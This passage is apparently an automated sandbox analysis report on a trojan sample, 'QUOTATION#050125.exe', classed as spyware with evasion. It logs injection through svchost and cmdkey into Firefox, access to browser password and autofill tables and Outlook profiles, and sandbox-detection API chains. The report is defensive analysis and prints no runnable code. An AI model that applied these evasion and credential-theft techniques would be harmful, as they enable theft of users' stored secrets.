Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_030870F1	5_2_030870F1
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03071623	5_2_03071623
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0306D62C	5_2_0306D62C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0307D646	5_2_0307D646
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_030436EC	5_2_030436EC
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308F6F6	5_2_0308F6F6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03015550	5_2_03015550
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308F5C9	5_2_0308F5C9
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_030875C6	5_2_030875C6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0303D480	5_2_0303D480
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03065490	5_2_03065490
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0300DB19	5_2_0300DB19
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308FB2E	5_2_0308FB2E
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FEFAA0	5_2_02FEFAA0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03061B80	5_2_03061B80
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308FA89	5_2_0308FA89
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD9870	5_2_02FD9870
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FEB870	5_2_02FEB870
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_030159C0	5_2_030159C0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD3800	5_2_02FD3800
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02F999E8	5_2_02F999E8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03045870	5_2_03045870
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308F872	5_2_0308F872
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_030498B2	5_2_030498B2
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_030818DA	5_2_030818DA
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_030878F3	5_2_030878F3
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0304FF40	5_2_0304FF40
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD1EB2	5_2_02FD1EB2
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308FF63	5_2_0308FF63
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03073FA0	5_2_03073FA0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03081FC6	5_2_03081FC6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03089ED2	5_2_03089ED2
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FEFCE0	5_2_02FEFCE0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03083D22	5_2_03083D22
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308FD27	5_2_0308FD27
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03087D4C	5_2_03087D4C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD3C60	5_2_02FD3C60
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0306FDF4	5_2_0306FDF4
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD9DD0	5_2_02FD9DD0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03069C98	5_2_03069C98
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03057CE8	5_2_03057CE8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EEEF38	5_2_02EEEF38
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EEE255	5_2_02EEE255
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EEE373	5_2_02EEE373
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EED7D8	5_2_02EED7D8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EEE714	5_2_02EEE714
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EECA88	5_2_02EECA88

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038BEF10 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03875050 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03887BE4 appears 101 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0382B910 appears 275 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038AE692 appears 86 times
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: String function: 00489CB3 appears 31 times
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: String function: 0049F9F2 appears 40 times
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: String function: 004A0A30 appears 46 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 03005050 appears 58 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 02FBB910 appears 280 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 03017BE4 appears 111 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 0304EF10 appears 105 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 0303E692 appears 86 times

Source: QUOTATION#050125.exe, 00000000.00000003.2047609298.0000000004B8D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION#050125.exe
Source: QUOTATION#050125.exe, 00000000.00000003.2047263169.00000000049E3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION#050125.exe

Source: QUOTATION#050125.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@23/12

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004F37B5 GetLastError,FormatMessageW,

0_2_004F37B5

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004E10BF AdjustTokenPrivileges,CloseHandle,		0_2_004E10BF
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004E16C3

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_004F51CD

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_0050A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0050A67C

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004F648E CoInitialize,CoCreateInstance,CoUninitialize,

0_2_004F648E

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_004842A2

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

File created: C:\Users\user\AppData\Local\Temp\obtenebrate

Jump to behavior

Source: QUOTATION#050125.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cmdkey.exe, 00000005.00000002.6082932285.0000000007889000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2814958505.000000000787F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: cmdkey.exe, 00000005.00000003.2809330246.0000000002974000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6079587429.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2809481101.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2815143110.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2813644388.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2812292508.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2814129889.0000000002994000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: cmdkey.exe, 00000005.00000002.6079587429.00000000029F4000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.5.dr	Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: QUOTATION#050125.exe	ReversingLabs: Detection: 68%
Source: QUOTATION#050125.exe	Virustotal: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION#050125.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
Source: C:\Windows\SysWOW64\cmdkey.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\cmdkey.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmdkey.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: QUOTATION#050125.exe

Static file information: File size 1747456 > 1048576

Source: QUOTATION#050125.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: QUOTATION#050125.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: QUOTATION#050125.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: QUOTATION#050125.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: QUOTATION#050125.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: QUOTATION#050125.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: QUOTATION#050125.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: cmdkey.pdbGCTL source: svchost.exe, 00000002.00000003.2604333762.0000000003213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2636124473.0000000003200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: QUOTATION#050125.exe, 00000000.00000003.2046461469.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#050125.exe, 00000000.00000003.2050896599.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550014874.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553539900.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2635545148.0000000002C27000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6080846362.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2638736740.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6080846362.00000000030BD000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: QUOTATION#050125.exe, 00000000.00000003.2046461469.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#050125.exe, 00000000.00000003.2050896599.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2550014874.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553539900.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000005.00000003.2635545148.0000000002C27000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6080846362.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2638736740.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6080846362.00000000030BD000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: cmdkey.pdb source: svchost.exe, 00000002.00000003.2604333762.0000000003213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2636124473.0000000003200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000007C5C000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000035FC000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6079587429.000000000290D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002D9BC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000007C5C000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000035FC000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6079587429.000000000290D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002D9BC000.00000004.80000000.00040000.00000000.sdmp

Source: QUOTATION#050125.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: QUOTATION#050125.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: QUOTATION#050125.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: QUOTATION#050125.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: QUOTATION#050125.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004842DE

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A0A76 push ecx; ret	0_2_004A0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040505A push cs; iretd	2_2_00405061
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040189C push ss; iretd	2_2_004018A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004180AB push esp; ret	2_2_004180AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040514D push ds; iretd	2_2_00405171
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411A63 push ebp; retf	2_2_00411A6D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00407270 push 0000006Ch; iretd	2_2_0040727B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418274 push esp; retf	2_2_00418281
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403340 push eax; ret	2_2_00403342
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004174CC push esp; retf	2_2_004174D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004045D4 push esp; iretd	2_2_004045DD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413663 push cs; ret	2_2_00413695
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417630 push edi; ret	2_2_0041763A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404F63 push esi; iretd	2_2_00404F66
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038308CD push ecx; mov dword ptr [esp], ecx	2_2_038308D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0794753D push edx; iretd	2_2_0794753E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_079454A5 push esp; iretd	2_2_079454C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07946404 push ecx; ret	2_2_07946405
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_079452B4 push edi; ret	2_2_079452B7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0795124E push ebp; ret	2_2_07951250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07955042 push eax; ret	2_2_07955044
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07944F53 push ss; retf	2_2_07944FCF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07945D9C push ecx; iretd	2_2_07945D9D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0794CDEC push esi; retf	2_2_0794CDF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07944C5A push eax; iretd	2_2_07944C5F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07945B8D push FFFFFFC9h; iretd	2_2_07945B96
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07944BA2 push esp; iretd	2_2_07944BA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0794C9AE push eax; retf	2_2_0794C9B9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_079448F7 pushad ; iretd	2_2_07944902
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4_2_0065D042 push eax; ret	4_2_0065D044
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4_2_0064CC5A push eax; iretd	4_2_0064CC5F

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_0049F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0049F98E
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_00511C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00511C41

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-96952

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	API/Special instruction interceptor: Address: 1B29C74
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFAC66AD144
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFAC66B0594
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFAC66AFF74
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFAC66AD6C4
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFAC66AD864
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFAC66AD004
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFAC66AD144
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFAC66B0594
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFAC66AD764
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFAC66AD324
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFAC66AD364
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFAC66AD004
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFAC66AFF74
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFAC66AD6C4
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFAC66AD864
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFAC66AD604

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0387088E rdtsc

2_2_0387088E

Source: C:\Windows\SysWOW64\cmdkey.exe

Window / User API: threadDelayed 9166

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	API coverage: 3.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.9 %
Source: C:\Windows\SysWOW64\cmdkey.exe	API coverage: 1.1 %

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 2652	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 2712	Thread sleep count: 120 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 2712	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 2712	Thread sleep count: 9166 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 2712	Thread sleep time: -18332000s >= -30000s	Jump to behavior

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmdkey.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmdkey.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004BC2A2 FindFirstFileExW,	0_2_004BC2A2
